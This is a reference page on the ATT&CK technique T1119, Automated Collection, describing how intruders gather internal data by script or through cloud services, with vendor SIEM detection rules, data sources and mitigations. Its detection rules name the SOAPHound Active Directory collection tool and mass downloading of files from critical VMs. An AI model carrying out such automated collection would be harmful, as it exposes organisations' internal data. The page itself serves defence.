T1119: Automated Collection
Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of a Command and Scripting Interpreter to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals.
In cloud-based environments, adversaries may also use cloud APIs, data pipelines, command line interfaces, or extract, transform, and load (ETL) services to automatically collect data.
This functionality could also be built into remote access tools.
This technique may incorporate use of other techniques such as File and Directory Discovery and Lateral Tool Transfer to identify and move files, as well as Cloud Service Dashboard and Cloud Storage Object Discovery to identify resources in cloud environments.
Positive Technologies products that cover the technique
MaxPatrol SIEM knowledge base
vsphere_suspicious_user_activity: PT-CR-518: Mass_downloading_files_of_critical_VM: Files from multiple security-critical virtual machines are downloaded
hacking_tools: PT-CR-2244: SOAPHound_Usage: SOAPHound was used, which is a tool that collects Active Directory data via the Active Directory Web Services (ADWS) protocol
pt_application_firewall: PT-CR-640: Web_Automation_Tool: The use of software for automation of requests to web services
Detection
ID | DS0012 | Data source and component | Script: Script Execution | Description | Monitor for any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent. |
---|
ID | DS0022 | Data source and component | File: File Access | Description | Monitor for unexpected files (e.g., .pdf, .docx, .jpg, etc.) viewed for collecting internal data. |
---|
ID | DS0017 | Data source and component | Command: Command Execution | Description | Monitor executed commands and arguments for actions that could be taken to collect internal data. |
---|
Mitigation
ID | M1029 | Name | Remote Data Storage | Description | Encryption and off-system storage of sensitive information may be one way to mitigate collection of files, but may not stop an adversary from acquiring the information if an intrusion persists over a long period of time and the adversary is able to discover and access the data through other means. |
---|
ID | M1041 | Name | Encrypt Sensitive Information | Description | Encryption and off-system storage of sensitive information may be one way to mitigate collection of files, but may not stop an adversary from acquiring the information if an intrusion persists over a long period of time and the adversary is able to discover and access the data through other means. Strong passwords should be used on certain encrypted documents that use them to prevent offline cracking through Brute Force techniques. |
---|